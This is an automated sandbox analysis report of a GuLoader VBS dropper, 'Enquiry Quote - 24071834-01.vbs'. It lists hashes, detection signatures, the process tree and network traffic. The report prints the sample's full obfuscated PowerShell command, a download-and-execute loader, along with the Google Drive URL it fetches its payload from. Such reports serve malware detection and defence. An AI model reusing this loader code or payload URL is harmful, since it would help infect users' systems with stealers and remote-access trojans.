Windows Analysis Report
Enquiry Quote - 24071834-01.vbs

Overview

General Information

Sample name: Enquiry Quote - 24071834-01.vbs
Analysis ID: 1466658
MD5: 9e2fe2b97264a9c35794d67e1c17ee26
SHA1: 3d32f6f565e50eeeba893e7734a860b7bc45a1d4
SHA256: d692bbec767a90d323a15ef761c1a207480f417ffd1509717e1b6793c0b7299a
Tags: vbs

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. 
auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T ';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a= (BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale (Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale (Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco= P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 
'G,$ NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf +.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale (Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A [,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio ,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$ iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2020 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3024 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated command string as PID 8084 above MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3824 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000013.00000002.2567559021.0000000008B10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000013.00000002.2550702407.0000000005ECB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000013.00000002.2567702655.0000000009DB3000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Process Memory Space: powershell.exe PID: 8084 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_8084.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_3024.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (listed below)
              • 0xdd8c:$b2: ::FromBase64String(
              • 0xce00:$s1: -join
              • 0x65ac:$s4: +=
              • 0x666e:$s4: +=
              • 0xa895:$s4: +=
              • 0xc9b2:$s4: +=
              • 0xcc9c:$s4: +=
              • 0xcde2:$s4: +=
              • 0x15e7b:$s4: +=
              • 0x15efb:$s4: +=
              • 0x15fc1:$s4: +=
              • 0x16041:$s4: +=
              • 0x16217:$s4: +=
              • 0x1629b:$s4: +=
              • 0xd632:$e4: Get-WmiObject
              • 0xd821:$e4: Get-Process
              • 0xd879:$e4: Start-Process
              • 0x16b0f:$e4: Get-Process

              System Summary

              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine|base64offset|contains: B-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", ProcessId: 5604, ProcessName: wscript.exe
              Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", CommandLine|base64offset|contains: B-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs", ProcessId: 5604, ProcessName: wscript.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the obfuscated command string of PID 8084 shown in the process tree above (cut off in this report entry)
              No Snort rule has matched

              AV Detection

              Source: Enquiry Quote - 24071834-01.vbs, Virustotal: Detection: 9%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
              Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbRZ source: powershell.exe, 00000013.00000002.2559116933.000000000771C000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: drive.google.com; Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: drive.usercontent.google.com; Connection: Keep-Alive
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic, DNS traffic detected: DNS query: drive.google.com
              Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3V
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3Ve
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeU
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUK
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKa
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaW
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWB
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBg
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgw
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwl
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5r
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rl
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlz
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzj
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm3
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm35
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354P
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PP
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPM
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMi
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMis
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisR
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEE26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRUP
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRUXR
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
              Source: powershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
              Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49707 version: TLS 1.2

              System Summary

              Source: amsi32_3024.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5168
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5168
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. 
auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS 